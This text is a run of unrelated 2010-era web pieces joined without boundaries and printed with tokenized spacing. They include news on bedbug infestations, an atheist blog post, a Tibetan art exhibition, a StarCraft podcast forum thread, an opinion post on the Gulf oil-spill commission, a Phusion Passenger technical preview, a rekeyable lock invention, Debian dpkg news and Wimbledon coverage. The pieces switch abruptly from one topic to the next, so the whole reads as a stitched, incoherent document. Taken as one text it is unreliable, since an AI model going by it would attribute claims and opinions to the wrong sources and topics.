July 25 , 2010  -- Bedbug infestations are the stuff of urban lore among New York City apartment dwellers .
The tiny pests appear to have become the bane of city shopkeepers , too .
In recent days , the bugs forced the temporary closures of a Victoria 's Secret and Abercrombie and Fitch .
The shops say they 've rid their stores of the bugs , but experts say the infestations are just the latest indication of the bedbug 's strong comeback .
After mostly being eradicated form the US a half century ago , infestations are so common that New York City formed a Bed Bug Advisory Board in 2009 to focus on preventing infestations .
According to New York City 's Housing Preservation and Development department , bedbug complaints in the city have skyrocketed over the past five years , from just over 500 in 2004 to over 10,000 in 2009 .
In June , the New York state legislature passed a law requiring landlords to give potential renters a " bedbug history " of their property .
And the United States is not the only country seeing an upsurge in bedbugs , which feed on blood , over the past five to seven years .
Michael Potter , an entomology professor at the University of Kentucky , says this is a worldwide phenomenon .
" We just finished a global survey of about a thousand pest control companies in 43 different countries , " Potter says .
" They see the same thing that we have here . "
Bedbugs were a rare sight in the United States of the 1950s .
A combination of strong pesticides and robust public education kept them at bay , making sightings relatively rare .
However , some of the strong pesticides -- such as DDT -- that work best against bedbugs have since been banned .
What 's more , the few bedbugs that survived in that time developed some resistance against the most effective family of anti-bedbug pesticides , called pyrethroids .
As a result , bedbugs are much more difficult to get rid of today .
Steam - cleaning of clothes and vacuuming are powerful tools against bedbug infestations , but pesticides " are still the meat and potatoes of [ bedbug ] elimination , " says Potter , " and we just do n't have pesticides that are as residually potent anymore , which is to say that you have to hit the bug directly now to kill it .
Once the deposits dry , there 's no lasting protection . "
Besides issues with pesticides , there may be other reasons behind bedbugs ' resurgence .
Potter says no one is quite sure how they made such a dramatic reappearance , but one popular theory among experts is that the exponential expansion of international travel since the 1950s has made the spread of pests much easier .
More people have also just become less vigilant about checking for the critters , but more paranoid once they are discovered .
" Back then , if you saw a bedbug , it was just a part of life , " Potter says .
" Now , you see a bedbug , and you shut down an entire store or a floor of an office building . "
A couple years ago , I started receiving Christian magazines in my mailbox .
( I guess anonymous Christians felt if I read them , I ’d get converted or something .
Who knows how they found my address … )
My favorite in the bunch was Charisma because I * facepalmed * through every issue .
It was free entertainment .
It would have been more fun if I did n’t know that actual subscribers actually agreed with what was in it .
That was ( and still is ) frightening .
For example , their most recent issue is all about Heaven and Hell … they ’re dedicating an issue to a subject no one can possibly know anything about because you would only know about it after you die and you would n’t be in a position to tell anyone ab — oh , forget it .
You all know what I ’m saying .
But that ’s not going to stop them .
They have “ experts ” weighing in on what goes on in Heaven .
( Spoiler : You ’ll have a job after you die ! )
I have a lot of problems with Christianity .
One of them is that Christians act like they “ know ” things when , really , they have no clue about them .
Does anything happen when we die ?
Accurate answer :
If you ’re buried , your body will soon rot .
Christian answer :
If you were faithful and accepted Jesus into your heart , you will go to Heaven .
If you rejected Jesus , you ’ll burn in hell for all eternity .
How did the universe begin ?
Accurate answer : Evidence suggests there was a “ Big Bang “ … what happened before that ?
We may never know .
Christian answer : God created it .
Does God exist ?
Accurate answer :
Is it possible that a god exists ?
Perhaps — even many atheists will refrain from saying “ God absolutely does not exist . ”
But there ’s never been any verifiable evidence that a god exists .
Christian answer : I know God exists and I know what he wants for my life and he listens to my prayers and we have conversations .
…
I prefer the truth , even if that means I do n’t have all the answers to the “ big questions . ”
That ’s why I ’m an atheist .
What Charisma is doing ?
That ’s pure dishonesty .
And you ’ll never see their readers calling them out on it .
Taiwan 's Palace Museum is exhibiting rare Tibetan Buddhism artefacts , shipped from China , in a show called Tibet , Treasures From the Roof of the World .
Some analysts have described the show as another sign of thawing relations between China and Taiwan - but it is not being welcomed by exiled Tibetans living in Taiwan .
The collection on display in Taipei comes from 12 museums and Tibetan Buddhist monasteries , including the Potala Palace in Lhasa .
This Kapala Bowl is made from a monk 's skull with a gilt copper cover .
Many of the items are of religious and cultural significance to Tibetans , such as these 17th Century carved wooden animal head daggers .
Tibetan Buddhist monks have visited the exhibition to pay their respects to the sacred statues .
One monk says it is considered a blessing to have the chance to access these Buddhist treasures .
In this sense he welcomes the exhibition .
But many Tibetans say the exhibition serves as a platform for Beijing 's propaganda , depicting it as a showcase of a " diversified yet integrated " Chinese culture .
Dawa Tsering , representative of the Dalai Lama in Taiwan , says many Tibetans regard the exhibition as a display of stolen treasures by the looter - China .
Here an historical document from a Ming Dynasty emperor to Tibet is displayed .
The recently released Jedi Junkies documentary is a tour through Star Wars fandom , from the sexy to the slightly scary .
But unlike some other documentaries I ’ve seen that touch on serious fans , this one does n’t seem to have the mocking undertones .
Even interspersed with interviews with a psychologist talking about the nature of obsession , it ’s entirely respectful .
Though it touches on a lot of different types of Star Wars fans , the film highlights a few specific components :
Collectors
Tribute bands
Custom - made lightsabers
New York Jedi , a lightsaber dueling / choreography group
Two fan films : one called “ Stuck on Star Wars ” that included building a life - size Millennium Falcon in someone ’s backyard , and one still in production called “ Tremors of the Force ”
Behind the scenes of Chad Vader
Slave Leias , with a look at one photoshoot we ’ve seen before , and interviews with a Leia burlesque dancer and a bellydancer
There are also interviews with Attack of the Show ’s Olivia Munn , who spoke about the difference between dorky and sexy when it comes to fans :
“ Dorky Star Wars fans are the ones who have to correct you on every single thing .
Sexy are the guys who know and are passionate about it and can handle a lightsaber pretty well , and I can sit down and have coffee with you and talk about it without being corrected every third word . ”
If you ’re a big Star Wars fan , you ’ll probably get a kick out of this documentary , particularly the stuff you recognize .
A lot of filming was done at conventions ; I recognize a lot of Dragon Con in particular .
And if you ’re not a fan … well , you probably wo n’t get it .
But all in all , it ’s very well done and pretty entertaining , and the fans come off as people with a hobby as opposed to scary obsessives ( with the possible exception of the collectors , who are at times self - deprecating ) .
It ’s now available on iTunes or Amazon.com for purchase or rent .
And here ’s the trailer !
The Associated Press is reporting that the NHL has rejected the Devils 17 year , $ 102 million dollar contract with left - winger Ilya Kovalchuk .
Apparently , the NHL has rejected the contract on the grounds that the years of low salary at the end of the deal serve to only lower the cap hit .
The NHL does n’t believe that Kovalchuk will play out those final years , which pay him only $ 550,000 .
Neither Lou Lamoriello or Jeff Vanderbeek commented on the ruling tonight .
The NHLPA , which approved the deal , can file a grievance on behalf of Kovalchuk .
The contract will be void during that process .
As Tom Gulitti reports , the Devils employ Steve Pellegrini , the team ’s “ cap guru ” and vice president of hockey operations , who worked as an NHL cap regulator and knows the CBA inside and out .
If the deal would n’t work , you ’d figure he ’d tell the team .
It will be interesting to see where this goes from here .
From earlier comments , it did n’t seem like Lamoriello wanted this deal .
Now , he may have to go fight for it .
itmeJP Profile Joined February 2010 United States 1101 Posts Last Edited : 2010-06-21 09:41:43 # 2
Uhhhhh ... someone please rename this " [ EP6 ] State of the Game SC2 Podcast " please .
Such a fucking moron I am ...
Twitter.com/itmeJP
-- Twitch.tv/itmeJP
-- YouTube.com/itmeJP
Alethios Profile Blog Joined December 2007 New Zealand 2751 Posts # 3 I like the name as it is !
When you arise in the morning , think of what a precious privilege it is to be alive - to breathe , to think , to enjoy , to love .
Rhodan Profile Joined April 2010 Australia 230 Posts # 5
Hey JP , glad to see you 're planning on bringing SoG back as I really enjoyed all of them so far :D
Not so much a question , but I 'd love to see a discussion between TLO and Artosis about ZvT mech balance , I know Artosis believes mech is too powerful , while recently ( noticeably the Day9 Daily ) , TLO has said that it is n't and I would love to see some discussion between the two ( and other cast members of course ) , I play Protoss and do n't really have an opinion either way , but I 'd love to see a discussion on it .
I only needed one probe to take down idra .
I had to upgrade to a zealot for strelok . "
- Liquid`Tyler
itmeJP Profile Joined February 2010 United States 1101 Posts # 6 On June 21 2010 18:46 GTR wrote :
Staying as asdiuhasuidh uaihsd iuhas duihasduih , sorry .
+ Show Spoiler +
Kidding , renaming Staying as asdiuhasuidh uaihsd iuhas duihasduih , sorry .
I do n't know what you 're referring to good sir !
I do n't know what you 're referring to good sir !
Twitter.com/itmeJP
-- Twitch.tv/itmeJP
-- YouTube.com/itmeJP
heishe Profile Blog Joined June 2009 Germany 2235 Posts # 7 been waiting for this .
pm'ing a question right now .
If you value your soul , never look into the eye of a horse .
Your soul will forever be lost in the void of the horse .
itmeJP Profile Joined February 2010 United States 1101 Posts # 8 no do n't pm ! PREEZ !
NO !
In thread it is easier for me to keep track !
Twitter.com/itmeJP
-- Twitch.tv/itmeJP
-- YouTube.com/itmeJP
DragoonPK Profile Blog Joined July 2007 3256 Posts # 9 ok ... so is there a 6th eps soon ?
k!llua Profile Blog Joined March 2010 Australia 892 Posts # 10 ohhhh , so keen .
loved the last episode of this .
do n't ever make this podcast less than an hour please : D my hair is a wookie , your argument is invalid
SmoKim Profile Joined March 2010 Denmark 10002 Posts # 11 JP !!!!!!!!!!!!!!!!!!!!!!!
we missed you < 3 " LOL I have 202 supply right now ( 3 minutes later ) ...
" LOL NOW I HAVE 220 SUPPLY SUP ?!?!? "
- Mondragon
itmeJP Profile Joined February 2010 United States 1101 Posts Last Edited : 2010-06-21 10:17:30 # 12 On June 21 2010 18:58 DragoonPK wrote :
ok ... so is there a 6th eps soon ?
Some people do n't read
It should be up Wednesday night ( late ) .
Some people do n't read
It should be up Wednesday night ( late ) .
P.S. - I might broadcast this live ( or convince Sean to do it ) over UStream .
TV , but I 'll confirm / deny this before we record Wednesday night .
Also , so I can keep track of the questions better .
Also , so I can keep track of the questions better .
heishe @question
What do your guests think will set the worlds very best players apart from the " lower ranked " pro gamers :
Well trained , solid mechanics ( micro , macro ) or creativity in strategy and tactics ( hi TLO ) ?
Also , Liquid`Jinro semi-confirmed to possibly be there for the upcoming show !
zOMG Scoobs ! , Liquid`Jinro semi-confirmed to possibly be there for the upcoming show !
zOMG Scoobs !
Twitter.com/itmeJP
-- Twitch.tv/itmeJP
-- YouTube.com/itmeJP
TheAntZ Profile Blog Joined January 2009 Israel 6110 Posts Last Edited : 2010-06-21 11:01:34 # 13 @question
for artosis , somewhat in regard to his map balance article
What features in a map are beneficial or even imbalanced towards the different races ?
in other words , how can you tell when a map is imbalanced or works better for a certain race ?
43084 | Honeybadger : " So july , you 're in the GSL finals .
How do you feel ? ! " ~ July : " HUNGRY . "
Hengen Profile Joined April 2010 Finland 51 Posts Last Edited : 2010-06-21 10:38:06 # 14
Nice to have new episodes , I liked the earlier episodes a lot .
I do n't know whether having video along this type of program is necessary unless it has something to add to the show .
Personally watching people talk is n't usually worth it , so I would end up listening , video running in the taskbar .
Btw , there 's episode 5 roster in the OP , which distracted me to think this was old post done again , glad I read more precisely .
edit : I noticed I was bit too negative against video .
Video feed could be used to have info like current question / topic discussed or show example videos of certain discussion topic ( say like show how phoenix behaves after the shoot while moving patch ) .
www.casualbase.com provides program schedule and VoD archive for Starcraft 2 related programs .
Speake Profile Blog Joined May 2009 United States 494 Posts # 15
Do you guys think that adding tanks to the list of things PDD blocks would add a beneficial or detrimental aspect to TvT 's innovation and variety ?
tQ. Speake
deth Profile Blog Joined August 2009 Australia 1754 Posts # 16 Please get louder on with artosis .
Patches Profile Joined May 2010 United States 43 Posts # 17
The previous eps were fantastic , ca n't wait
heynes Profile Joined July 2009 Germany 200 Posts # 18 @question
I wanna know if they could import 1 thing from sc1 what would it be .
( It can be anything from maps over mechcanincs ( high ground advantage ? ) to Units )
Brokengamer Profile Joined April 2010 Philippines 116 Posts Last Edited : 2010-06-21 12:56:33 # 19 @question
With ultralisks finally being able to become a viable units ...
For ground - ground combat do you guys think that pure - melee zerg units ( zergling , baneling and ultralisks ) is now an equally powerful option in comparison to the standard pure - ranged zerg units build ( roach / hydra ) ..
Or do you guys think that the roach hydra will still be the bulk of the zerg ground - armies and the melee units are only for support / harrass ?
QuothTheRaven Profile Joined December 2008 United States 5512 Posts # 20 Sweet , I love this series !
And it 's 10 x more desirable to have this content when we 're in the middle of the beta drought . . . nevermore
1 2 3 4 5 10 11 12 Next All
Louisiana Senator Mary Landrieu says she opposes President Obama 's commission on BP 's oil spill because its membership consists entirely of independent scientists and includes no paid officials from the oil industry .
Her solution : create a new commission with power divided equally between big oil executives and independent researchers .
WASHINGTON --
On the same day the White House commission investigating the Gulf oil spill announced its first meetings -- July 12 - 13 in New Orleans -- a Senate committee cast what amounted to a no-confidence vote on the commission 's objectivity .
The Senate Energy and Natural Resources Committee voted Wednesday to create a congressional bipartisan commission to investigate the spill , with Sen. Mary Landrieu , D - La. , and others saying a separate panel is needed because the White House commission has four environmental advocates -- three members and the executive staff director -- but no oil industry representation .
" Maybe the commission that the Congress sets up , in a more balanced fashion , with both very strong environmental views and very strong industry views , could actually come up with something that really might work for the dilemma and the challenge that this nation faces , which briefly is this :
We use 20 million barrels of oil a day , " Landrieu said .
" That was true the day before the Deepwater Horizon blew up .
It is true today .
And we need to get that oil from somewhere . "
Brilliant idea , eh ?
Fair and balanced , right ?
Let 's give the oil industry veto power over the the commission investigating the oil disaster in the Gulf !
Smart .
This is exactly the kind of garbage that got us into this mess in the first place .
Amazingly , Landrieu is pushing it even as BP's well continues to flood the Gulf of Mexico .
She might as well scream " Drill , baby , drill " at the top of her lungs .
And she 's doing it eight months after mocking the very people who warned her that a disaster like this could happen :
Meanwhile , not to be outdone by Landrieu , GOP Sen .
Jim DeMint yesterday blocked legislation on the Senate floor that would have given the presidential spill commission subpoena power .
If nothing else , it 's a reminder that when it comes to the poor regulation and oversight of the oil industry , conservatives like Landrieu and DeMint need look no further than themselves when searching for somebody to blame .
Update : “ Phusion Passenger Lite ” has been renamed to “ Phusion Passenger Standalone ” nowadays .
The mass deployment feature has also been removed but will find its way back in the near future in a commercial version of Phusion Passenger .
Before Phusion Passenger came along , the most widely used Ruby app servers all implemented the same model which we refer to as the reverse proxy model .
In this model , the user had to manually setup a bunch of app server processes and had to configure the web server to proxy requests to the app server processes .
The technically inclined understand this model , but it is confusing to e.g. newcomers and to people who in general do n’t have a lot of system administration skills or a reasonable understanding of HTTP .
Most people were and still are much more familiar with PHP ’s model , where you tell the web server where your app is and then have the web server take care of the rest for you .
It was this confusion that caused all the uproar about sucky Rails deployment back in 2008 .
While developing Phusion Passenger for Apache , we decided to follow a PHP - like model because ease of use was one of our main goals .
No manual setups of app servers .
No manual proxy configuration .
Upload and go .
For Phusion Passenger for Nginx , we continued to follow this model .
Let ’s call this the automatic model .
As of 2010 , Phusion Passenger appears to be the only widely - used Ruby app server that implements this model ; the other widely - used Ruby app servers implement the reverse proxy model .
Reverse proxy vs automatic model : which one is better ?
Ever since Phusion Passenger was first released , debates popped up about which one is superior .
We believe that no model is inherently superior to the other .
They are just different , meaning that both models have their own pros and cons .
Which one is better for you depends a lot on your server infrastructure and your system administrators ’ preferences .
Phusion Passenger ’s automatic model :
Integrated into the web server .
Processes are managed along with the web server itself , and configuration happens in the web server config file .
Easier to comprehend for most people .
Appears more “ standard stack ” to system administrators who are not familiar with Ruby specifically .
Can spawn and shutdown processes dynamically according to traffic patterns .
Processes are automatically monitored : if they crash they are automatically restarted .
Less manual control over individual processes because they can come and go at any time .
Reverse proxy model as implemented by most other Ruby app servers :
App server is a separate entity .
Processes are managed distinctly from the web server itself .
Configuration happens outside the web server .
Many people have a hard time comprehending this and they generally find setups like this cumbersome , but to experts this model can be seen as simple , elegant and sensible .
Most app servers do not automatically restart crashed processes and one needs to monitor processes separately with things like Monit .
One needs to specify the number of processes up front : no dynamic process count scaling according to traffic .
Allows fine - grained manual control over individual processes .
We are not commenting on which points are supposed to be pros and which points are supposed to be cons because they are highly subjective .
For us , integration into the web server is a strong plus because we host dozens of apps on our server (s ) and we do n’t like to spend time managing app server processes for each app , but other people are uncomfortable with having the web server manage things automatically and would prefer to keep a close eye on everything .
The automatic model can also be problematic to people who were on the reverse proxy model because they already had their web servers and infrastructures configured in a certain way .
Switching to Phusion Passenger could mean changing a lot of web server configuration .
The hidden but unutilized potential
Reverse proxy model app servers can potentially have an extra advantage , but for some reason this has n’t been implemented to its full potential so far :
Reverse proxy app servers are just easier to get started with .
When you ’ve just created a new Rails app , you can start it with script / server and you ’re ready to go .
This works great in development but totally blows up in production .
Reverse proxy model app servers must be put behind a reverse proxy e.g .
Nginx or HAProxy for a variety of reasons such as security , load balancing between processes , handling of slow clients , etc .
In production environments nobody exposes Mongrel or Thin directly to the Internet .
Unicorn even explicitly documents that it is designed to be put behind a reverse proxy and that it does n’t bother with slow clients at all .
In contrast , Phusion Passenger 2.x requires one to configure the web server , meaning the user must first install a web server .
This is cumbersome when you ’re in development and just want to get started .
It is also cumbersome if you ’re a newcomer and are n’t familiar with Apache or Nginx , and you just want to get your app running on your server .
Do you type script / server in development instead of creating a virtual host in the Apache or Nginx ?
Well you ’re not the only one : we also do this until we eventually get sick of it , but there ’s always a mental blockade that tells us that editing the web server configuration file is too much work to bother with .
Well , until Phusion Passenger 3 comes along .
Phusion Passenger Lite : fusion between the reverse proxy and the automatic model
In addition to Phusion Passenger for Apache and Phusion Passenger for Nginx , Phusion Passenger 3 introduces a new component to the existing lineup : Phusion Passenger Lite .
When it comes to usage , its interface is almost identical to that of Mongrel and Thin .
To run your Ruby web app , just type this in the terminal and you ’re ready to go :
passenger start
Closing the gap between development and production
Phusion Passenger Lite consists of an Nginx core .
Nginx is known to be extremely scalable , high - performance and lightweight .
You do not need to have Nginx already installed ; this is automatically taken care of .
You also do not need to have any Nginx experience : Nginx is hidden from the user but its power is automatically utilized .
Unlike Mongrel , Thin and Unicorn , Phusion Passenger Lite can be directly exposed to the Internet .
It can serve static files at blazing speeds thanks to the Nginx core .
Mongrel and Thin can serve static files but they are n’t very good at it .
Unicorn does n’t even try .
Easy migration from existing reverse proxy app servers
Because the interface is so similar , you can easily swap Mongrel , Thin or Unicorn in your existing reverse proxy setup and replace it with Phusion Passenger Lite .
Unlike Mongrel and Thin , Phusion Passenger Lite only has to listen on a single socket instead of multiple , vastly simplifying your reverse proxy configurations .
Phusion Passenger Lite can listen on a Unix domain socket instead of a TCP socket , just like Thin and Unicorn .
In reverse proxy setups this can yield much higher performance than TCP sockets .
Advantages over existing reverse proxy app servers
Unlike Mongrel , Thin and Unicorn , Phusion Passenger Lite can dynamically spawn and shutdown processes according to traffic .
However you can also configure it to use a static number of processes !
In fact you can configure a minimum and a maximum and have Phusion Passenger Lite automatically figure out the number of processes to use for the current traffic .
Like Phusion Passenger for Apache / Nginx and Unicorn , worker processes that have crashed are automatically restarted .
That said , bear in mind that this advantage can be a disadvantage to some people .
At its heart , Phusion Passenger Lite still manages processes for you , so you do n’t have as much fine - grained control over the processes as you do with other reverse proxy app servers .
Advantage over Phusion Passenger for Apache and Phusion Passenger for Nginx
Another unintended advantage of Phusion Passenger Lite is that it runs as the same user as the shell and respects environment variables that are defined for your shell , e.g. things like PATH , LD_LIBRARY_PATH , RUBYOPT , GEM_PATH and GEM_HOME .
Some people find that their app cannot load a certain library when the app is started in Phusion passenger , but can when the app is started with e.g. Mongrel or Thin .
This is almost always caused by some environment variable that ’s set in the shell but not in the web server : everything you set in /etc / bashrc and friends do n’t have effect on processes started from the web server .
Some people say that their application does not start on Phusion Passenger , but does under Mongrel / Thin .
Very often this turns out to be just a permission issue or some web server configuration issue .
With Phusion Passenger Lite , even confusion like this will be a thing of the past .
Rethinking the word “ easy ” : automatic mass deployment
Phusion Passenger is considered by many people the easiest Ruby app server out there .
But can it be easier ?
After some heavy thinking outside the box , we believe the answer is yes , it certainly can !
Imagine having a directory full of Ruby web apps , e.g. ~/ Sites .
To deploy an app , just drop your application ’s directory into ~/ Sites .
To undeploy it , remove the application ’s directory .
The application directory ’s name is used as the domain name .
No manually signaling the web server for a restart .
This is exactly what we ’ve done with Phusion Passenger Lite .
We call this feature automatic mass deployment .
Check out this demo .
So from now on , if you have a bunch of Ruby web apps in the same directory , just run this command in that directory
sudo passenger start -p 80 -u ( some_unprivileged_username )
and you ’ve immediately deployed every single app !
Conclusion
Phusion Passenger Lite does not replace Phusion Passenger for Apache or Phusion Passenger for Nginx .
Rather , it is a complement to our existing lineup of Phusion Passenger products , optimized for different use cases .
Phusion Passenger
Lite closes the gap between development and production and can be used comfortably and easily in both .
It can act as a drop - in replacement for your existing reverse proxy based setup .
It makes Ruby web app deployment even easier than before : now you do n’t even need a separate web server .
On the other hand , if you need integration into the web server , then Phusion Passenger for Apache / Nginx is for you .
We hope you ’ve enjoyed this Technology Preview .
Please stay tuned for the next one because we have more exciting news for you !
I volunteered as a crafts director at a girls camp last month .
So , for the past few months , I ’ve been preparing all the crafts and buying supplies for about 90 teenage girls to make cool stuff .
I ’ve kept the projects secret in case any of the girls read my blog , but now I ’ll fill you in .
These are the projects we made this year : duct tape wallets , resin pendant necklaces , alphabet fleece pillows , yo yo headbands and pins , door name plates , and paracord bracelets .
I think the girls had as much fun making them as I did .
And so can you because I ’m going to share all the tutorials .
( This post contains affiliate links .
If you use these links to buy something , I may earn a small commission .
You can read my full disclosure here . )
Most of us at one time or another has lost our keys and know the stress that it causes .
Compounding things is the cost that comes with calling out a locksmith to replace all the locks on the windows and doors of your house .
But what if you could change your locks simply by inserting another key ?
That ’s just what the Matrix Key System designed by Australian locksmith , Stuart Webb , does .
Inserting a new key into the lock effectively changes the lock , rendering the old key useless and saving the hassle and expense of calling a locksmith .
Standard pin-tumbler locks are the most common form of locks in the world .
They use pins of various lengths sitting in narrow chambers .
When the correct key is inserted the pins are aligned to allow the barrel to turn and the lock to be opened .
With standard locks the pins within pin-tumbler locks are of a set length .
Meaning that one key will always open the lock and changing this will require replacing the cylinder in the lock – which is what a locksmith does when they change your locks .
A conventional pin-tumbler lock ( Image : Pbroks13 via Wikipedia )
How it works
Webb ’s Matrix Key System uses an ingenious method to allow the length of the pins to be changed by inserting a new key .
Part of the pins are made from donut shaped discs of metal that sit in the bottom part of the chamber .
Each lock has a series of keys – a typical set has between six and twelve keys but it could theoretically be more .
When you wish to change the lock you grab the next key from the series , which will push some of the discs out of the way when it is inserted into the lock .
These discs are then deposited in extra “ spigot chambers ” that are incorporated into the barrel when the new key is turned .
Now the lock will only open to that key .
The extra â€œspigot chamber " incorporated into the barrel into which the discs are deposited
The new keys must be used in a specific sequence .
This is because each key in the series will have incrementally higher ridges so that one or more pins are pushed above the shear line ( the space between the barrel and the rest of the cylinder ) when the key is inserted .
Also , when incorporated into master - key systems , like those used in motels , each room can be changed individually without affecting the master - key or other room keys .
The system is illustrated in the pictures below .
The “ Phase 1 ” key ( with the red dot ) holds all the discs below the ‘ shear - line ’ and will operate like this indefinitely , just like a normal lock .
The magic happens when a “ Phase 1 ” key is lost or stolen ; then the “ Phase 2 ” key ( green dot ) is inserted and the uppermost disc is lifted above the ‘ shear - line ’ into the top part of the chamber , and as the key is turned the disc drops into a special hole which permanently removes it from operation , thereby preventing the missing “ Phase 1 ” key from operating .
The ‘ Phase 3 ’ key will disable the ‘ Phase 2 ’ key , etc etc .
The inner workings of the Matrix Key System
Webb says his Matrix Key System can be adapted to almost any pin-tumbler lock , making it suitable for just about anything including doors , garages and padlocks .
His invention caught our eye when it appeared on the Australian ABC ’s New Inventors program .
Since then he has received a lot of interest from groups such as retirement homes , schools and councils .
The Northern Territory Govt. are also looking to install Matrix Key System locks on public housing to solve the problem of changing the locks every time a new tenant moves in .
They are currently conducting a 3 - 6 month trial on 50 housing commission houses and plan to extend that to 2,000 homes in the Katherine area for another 3 - 6 month trial after that .
With its potential to take a lot of work from locksmiths , Webb might have more trouble convincing them to sell his Matrix Key System , but it can be purchased in a number of different lock types , including padlocks and replacement cylinders for existing locks , through his website .
The .22 calibre rifle was one of several firearms which the bride and groom , Valentina Anitra , 22 , and Ignazio Licodia , 25 , were supposed to pose with on their big day in the village of Altofonte , near Palermo in Sicily .
The MLS edition of the Vancouver Whitecaps has officially begun to take shape with the launch of the team ’s MLS logo on Tuesday .
The club is readying for its debut season as the 17th team in the North American top flight in 2011 .
The new logo , which will be used beginning in November , features the full name of the club “ Vancouver Whitecaps FC ” along with a depiction of the mountains and waterfront that characterize the city that served as host of the 2010 Winter Olympics .
One of the featured colors is the “ Whitecaps Blue , ” used as a tribute to the color used in the club ’s logo from the 1979 NASL Soccer Bowl championship season .
" Today was a historic moment for our club , our fans , and our city , " Whitecaps FC chief executive officer Paul Barber said in a statement .
" I believe our fans and our players will take immense pride in wearing the logo we ’ve unveiled here today — and that it will set the tone for the many great years to come . "
Merchandise featuring the new logo has already been made available for purchase .
Vancouver also announced that they will accept one last round of MLS season ticket deposits beginning this weekend .
On Saturday at 10 a.m. PT , the club will accept $ 50 deposits for 2011 MLS seasons tickets , which start at $ 319 for 17 matches .
The Whitecaps have already received 10,000 season ticket deposits .
The season ticket list for the 2011 inaugural season will be capped at 16,500 .
Dpkg got rid of Perl
Let ’s start with the interesting part and the great news : dpkg 1.15.8 ( to be uploaded soon ) will no longer need perl !
After my changes to rewrite update - alternatives in C , Guillem recently pushed the rewrite of dpkg - divert / mksplit in C .
Please test it out ( binary package for i386 or .dsc ) .
This is rather exciting news for those who would like to use dpkg in embedded contexts .
And it ’s great to see this completed in time for Squeeze .
In Squeeze +1 , we might go one step further and merge cdebconf , the C replacement for debconf .
I got rid of some recurring administrative tasks
I have been administrating the Alioth server since its inception ( see the announce I sent in 2003 ) but I ’m no longer enjoying the day - to - day administrative work that it represents .
That ’s why I just retired from the team .
We recently recruited Tollef Fog Heen so the number of admins is still the same ( that said , Alioth could benefit from some more help , if you ’re a DD and interested , drop a mail to admin@alioth.debian.org or come to #alioth ) .
Same goes for the collab - maint project .
I have dealt with hundreds of requests to add new contributors to the project since it ’s the central repository where all Debian developers have write access and where they put the VCS for their packages that do not belong to a more specialized team .
The new administrator that will approve the requests is Xavier Oswald and he ’s doing the work under the umbrella of the New Maintainer ’s Front Desk .
The future
I will continue to spend the same amount of time on Debian , the time freed will quickly be reallocated to other Debian and free software related projects .
In fact , I even anticipated a bit by launching Flattr FOSS last week but that ’s a relatively simple project . 🙂
The other projects that will never all fit in the freed time : I want to spend more time working on dpkg .
I do plan to blog more often too , but I ’m sure you ’ll notice that yourself soon .
I would like to see my Debian book translated into English ( another post coming on the topic sometimes soon ) .
In my dreams , I could even start yet another software project , I have some ideas that I really would like to see implemented but I do n’t see how that could fit in this year ’s planning … unless I can convince someone else to implement them !
Maybe I should blog about them .
When plaintiffs and defendants reach a settlement before a trial , which happens in most cases , they are n’t required to specify which parts of the settlement are punitive and which are compensatory ; there is typically just one number .
That allows defendants to disguise the amounts that they would have paid as punitive damages as additional compensatory damages .
Image Credit ...
Tucker Nichols
And because the measure maintains the deductible status of compensatory damages , nearly all punitive damages will remain , as a practical matter , deductible .
This easy circumvention surely explains the meager revenue projections from the measure : $ 315 million over 10 years .
While the Internal Revenue Service might try to dissect settlements and classify portions of them as punitive damages , to do so it needs help from both parties to the negotiation .
The problem here is that plaintiffs have no incentive to characterize the settlement correctly .
Indeed , in cases involving personal physical injury , plaintiffs are better off tax - wise by characterizing the settlement as entirely non-punitive because , while the punitive damages they receive are subject to tax , the compensatory damages are not .
Put a different way , the root of the problem is that jurors tend to believe that punitive damages are not deductible , even though they are .
So why not have plaintiffs ’ lawyers make jurors aware of the tax deductibility of punitive damages , and teach them how to adjust their awards to offset the deduction ’s effect ?
While plaintiffs ’ lawyers do n’t do this now , there is no precedent or persuasive legal argument that prevents them from doing so .
Undercover police unfairly used emotion - charged stories about their terminally ill parents to entrap minor players during a big cannabis operation , says a New Plymouth defence lawyer .
Police swooped on 35 gardening businesses across the country in April .
The two - year Operation Lime resulted in 250 arrests and more than 700 charges , having busted more than 100 commercial cannabis growing operations .
One of those arrested was New Plymouth shop assistant Reuben Wade , 25 , who had been unfairly taken in by the undercover female detective who visited Guru Gardener , his counsel Paul Keegan said yesterday .
Police transcripts of the conversation between the two reveal that the officer had told Wade her mother was terminally ill with cancer and asked for help to grow cannabis plants to help alleviate her pain .
" Police have set him up , " Mr Keegan said .
" It was a terrible thing to go into a shop and use a story like that .
It is entrapment .
It 's effectively harassment by the police .
" They have entrapped him into having the knowledge that it will be used for cultivation .
It 's quite appalling . "
It was not until nine months after the undercover operation that Wade was arrested and charged with two counts of supplying drug - related equipment following the sale to the undercover officer of a book on how to grow cannabis and some fertiliser .
Yet the book Wade sold could easily be bought elsewhere – as could the fertiliser , Mr Keegan said .
Results from a search of the Whitcoulls ' website comes up with the same book Wade sold to the police officer along with 179 other marijuana - related titles .
" It really makes a mockery of the law .
It is clear that some reform is needed , " Mr Keegan said .
Last week in New Plymouth District Court ,
Wade pleaded guilty to the two indictable charges .
He will be sentenced on August 16 , when Mr Keegan said he would make strong comments in mitigation .
In his submission to Judge Blaikie , Mr Keegan said that his client 's charges were very much a sideline to the major operation elsewhere in the country .
" This offending in relation to the New Plymouth store is largely unconnected with the wider operation involving more serious charges in other stores around the country . "
Click on auto - refresh for all the latest updates .
Email your thoughts on Rafa Nadal , Tomas Berdych or anything else to xan.brooks@guardian.co.uk and view pictures from the match
Play begins on Centre Court at 2 pm .
Xan will be here from 1.30 pm .
While you 're waiting , here are Kevin Mitchell 's musings on how Rafael Nadal is on the verge of eclipsing a certain Swiss fellow as the greatest player in the history of the game ...
Rafael Nadal has Roger Federer 's legacy in his sights
When they pack away the strawberries , calm the parched grass and close up this marvellous old institution for another year , Rafael Nadal 's name should be written all over the 133rd edition of Wimbledon .
If he beats Tomas Berdych in the final this afternoon – as he should do on rising form and proven pedigree – the amazing Spaniard will be closing in on Roger Federer for the unofficial and hotly contested title of best player in the history of the game .
If that has the sting of blasphemy about it – and Nadal thinks it does – there are reasons to at least wonder if he could unseat the Swiss , winner of six Wimbledons among his 16 Grand Slam titles , a whopping nine in front of Nadal , who has won here just once and been runner - up twice – both to Federer .
As Federer maintained after an imperfect exit from these championships at the quarter - final stage , he is still hungry to resume his trophy chasing .
He does not accept there is even a hint of a decline in his game , and it would indeed be a brave bookmaker who offered a price on his not winning more major titles , maybe even another handful , which would probably put him out of sight of the rest of the field , and certainly he remains the prime threat on grass .
Article continues
The preview : Final Sunday , end of days and these championships are drawing to a close .
